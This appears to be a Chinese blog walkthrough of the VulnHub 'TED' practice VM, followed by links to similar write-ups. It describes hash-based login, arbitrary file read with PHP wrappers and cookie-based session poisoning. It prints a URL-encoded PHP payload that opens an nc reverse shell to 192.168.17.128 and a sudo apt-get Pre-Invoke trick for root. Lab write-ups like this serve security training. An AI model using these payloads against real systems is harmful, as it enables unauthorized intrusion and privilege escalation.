vulnhub-TED靶场过程记录

VSole2021-08-06 10:37:30

靶场地址:https://download.vulnhub.com/ted/Ted.7z

靶场设置 使用VM打开

扫描靶场网段,得到ip地址

访问网址是个登陆框

扫描目录无果后,开始对登录框进行探索。

随便输入个密码后,发现密码或者密码hash错误,尝试多样的密码对比图如下

看来密码是admin没错了,然后应该是hash加密后访问。

这里耗尽了大量的时间,得出来了结果(还是朋友做出来的,难受)

这里使用的是sha256加密,然后加密的字符串,字符转换大写


在在线网站进行大小写转换


一发入魂

获得下一步提示

在search存在任意文件读取


阅览cookie.php发现回显了文件

这里有一个authenticate.php


正常读取会出现退出登陆的情况,使用php伪协议读取到了文件

源码如下

同样的方式读取home

Home文件中有这么一句话

$_SESSION['user_pref'] = $_COOKIE['user_pref'];

任意文件读取到sessions目录

第一种

写入一句话木马

链接蚁剑

但是上传不了脚本

一时间不知道咋弄了

第二种

%3C?php%20exec('nc%20192.168.17.128

%202222%20-e%20/bin/bash')%20?%3E

反弹nc

回到sessions哪里,因为有nc

对shell进行升级

SHELL=/bin/bash script -q /dev/null

然后卡壳,最终解决如下

记录如下

输入

sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"

提权

本作品采用《CC 协议》,转载必须注明作者和本文链接
靶场地址:https://download.vulnhub.com/ted/Ted.7z靶场设置 使用VM打
vulnhub之VENGEANCE的实践
2022-06-19 12:06:05
今天实践的是vulnhub的VENGEANCE镜像, 下载地址,https://download.vulnhub.com/digitalworld/VENGEANCE.7z, 用workstation导入成功,先做端口扫描, sudo netdiscover -r 192.168.137.0/24,
vulnhub之Five86-1的实践
2023-10-16 09:27:53
vulnhub之Five86-1的实践
vulnhub之sar的实践
2023-09-04 09:33:30
今天实践的是vulnhub的sar镜像,
vulnhub之2much的实践
2023-08-14 09:40:07
vulnhub之2much的实践
vulnhub之katana的实践
2023-07-24 09:41:01
今天实践的是vulnhub的katana镜像,下载地址,https://download.vulnhub.c
vulnhub之CengBox的实践
2023-07-17 09:23:02
今天实践的是vulnhub的CengBox镜像,下载地址,https://download.vulnhub.com/cengbox/CengBox.ova,无法用workstation导入,用virtualbox导入成功,做地址扫描,sudo netdiscover -r 192.168.0.0/24,获取到靶机地址192.168.0.185,继续进行端口扫描,sudo nmap -sS -sV
vulnhub之mhz_c1f的实践
2023-07-10 14:29:56
今天实践的是vulnhub的mhz_c1f镜像,下载地址,https://download.vulnhub.com/mhzcxf/mhz_c1f.ova.zip,无法用workstation导入,用virtualbox导入成功,做地址扫描,sudo netdiscover -r 192.168.0.0/24,获取到靶机地址192.168.0.186,继续进行端口扫描,sudo nmap -sS -
今天实践的是vulnhub的devrandomCTF镜像,下载地址,https://download.vul
第二要找到用户数据的提交格式及内容第三要找到验证失败的返回相应特征。这些信息足够hydra进行爆破和判断,使用hydra进行爆破。我们换一种思路,首先生成1800个0,再用msf-pattern_create生成一个200长度的字符串,再进行查找。在调试器左下角调用python脚本显示所有模块,选择其中false多的选项,这里使用第二个,再在这个模块里面搜索jmp esp指令。继续构造payload,使用msfvenom生成paypoad。成功反弹shell,但是看起来是windows的shell,使用dir查看发现就是linux的根目录。
VSole
网络安全专家